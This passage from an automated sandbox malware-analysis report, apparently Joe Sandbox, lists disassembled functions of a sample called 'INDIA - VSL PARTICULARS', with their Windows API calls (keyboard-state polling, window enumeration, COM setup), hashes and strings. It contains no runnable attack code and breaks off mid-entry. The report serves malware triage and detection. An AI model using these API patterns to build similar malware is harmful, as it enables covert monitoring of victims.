                                • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                              • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                              • String ID: BUTTON
                              • API String ID: 1834419854-3405671355
                              • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                              • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                              • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                              • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                              Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                              • LoadStringW.USER32(00000000), ref: 00454040
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • _wprintf.LIBCMT ref: 00454074
                              • __swprintf.LIBCMT ref: 004540A3
                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                              • API String ID: 455036304-4153970271
                              • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                              • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                              • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                              • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                              Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                              Download Yara Rule
                              APIs
                              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                              • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                              • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                              • _memmove.LIBCMT ref: 00467EB8
                              • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                              • _memmove.LIBCMT ref: 00467F6C
                              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                              • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                              • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                              • String ID:
                              • API String ID: 2170234536-0
                              • Opcode ID: ee399615404d7bb1bafc861e07f1b5ddd683e7781e6b5cedfe79e56e9046232f
                              • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                              • Opcode Fuzzy Hash: ee399615404d7bb1bafc861e07f1b5ddd683e7781e6b5cedfe79e56e9046232f
                              • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                              Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                              Download Yara Rule
                              APIs
                              • GetKeyboardState.USER32(?), ref: 00453CE0
                              • SetKeyboardState.USER32(?), ref: 00453D3B
                              • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                              • GetKeyState.USER32(000000A0), ref: 00453D75
                              • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                              • GetKeyState.USER32(000000A1), ref: 00453DB5
                              • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                              • GetKeyState.USER32(00000011), ref: 00453DEF
                              • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                              • GetKeyState.USER32(00000012), ref: 00453E26
                              • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                              • GetKeyState.USER32(0000005B), ref: 00453E5D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: State$Async$Keyboard
                              • String ID:
                              • API String ID: 541375521-0
                              • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                              • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                              • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                              • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                              Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                              Download Yara Rule
                              APIs
                              • GetDlgItem.USER32(?,00000001), ref: 004357DB
                              • GetWindowRect.USER32(00000000,?), ref: 004357ED
                              • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                              • GetDlgItem.USER32(?,00000002), ref: 0043586A
                              • GetWindowRect.USER32(00000000,?), ref: 0043587C
                              • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                              • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                              • GetWindowRect.USER32(00000000,?), ref: 004358EE
                              • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                              • GetDlgItem.USER32(?,000003EA), ref: 00435941
                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Window$ItemMoveRect$Invalidate
                              • String ID:
                              • API String ID: 3096461208-0
                              • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                              • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                              • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                              • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                              Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                              • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                              • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                              • DeleteObject.GDI32(?), ref: 0047151E
                              • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                              • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                              • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                              • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                              • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                              • DeleteObject.GDI32(?), ref: 004715EA
                              • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                              • String ID:
                              • API String ID: 3218148540-0
                              • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                              • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                              • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                              • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                              Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                              • String ID:
                              • API String ID: 136442275-0
                              • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                              • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                              • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                              • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                              Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                              Download Yara Rule
                              APIs
                              • _wcsncpy.LIBCMT ref: 00467490
                              • _wcsncpy.LIBCMT ref: 004674BC
                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                              • _wcstok.LIBCMT ref: 004674FF
                                • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                              • _wcstok.LIBCMT ref: 004675B2
                              • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                              • _wcslen.LIBCMT ref: 00467793
                              • _wcscpy.LIBCMT ref: 00467641
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • _wcslen.LIBCMT ref: 004677BD
                              • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                              • String ID: X
                              • API String ID: 3104067586-3081909835
                              • Opcode ID: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                              • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                              • Opcode Fuzzy Hash: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                              • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                              Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                              Download Yara Rule
                              APIs
                              • OleInitialize.OLE32(00000000), ref: 0046CBC7
                              • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                              • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                              • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                              • _wcslen.LIBCMT ref: 0046CDB0
                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                              • CoTaskMemFree.OLE32(?), ref: 0046CE42
                              • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                              Strings
                              • NULL Pointer assignment, xrefs: 0046CEA6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                              • String ID: NULL Pointer assignment
                              • API String ID: 440038798-2785691316
                              • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                              • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                              • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                              • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                              Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                              Download Yara Rule
                              APIs
                              • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                              • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                              • _wcslen.LIBCMT ref: 004610A3
                              • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                              • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                              • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                              • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                              • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                              • GetWindowRect.USER32(?,?), ref: 00461248
                                • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                              • String ID: ThumbnailClass
                              • API String ID: 4136854206-1241985126
                              • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                              • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                              • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                              • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                              Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                              Download Yara Rule
                              APIs
                              • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                              • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                              • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                              • GetClientRect.USER32(?,?), ref: 00471A1A
                              • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                              • DestroyIcon.USER32(?), ref: 00471AF4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                              • String ID: 2
                              • API String ID: 1331449709-450215437
                              • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                              • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                              • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                              • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                              Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                              • __swprintf.LIBCMT ref: 00460915
                              • __swprintf.LIBCMT ref: 0046092D
                              • _wprintf.LIBCMT ref: 004609E1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                              • API String ID: 3054410614-2561132961
                              • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                              • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                              • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                              • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                              Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                              Download Yara Rule
                              APIs
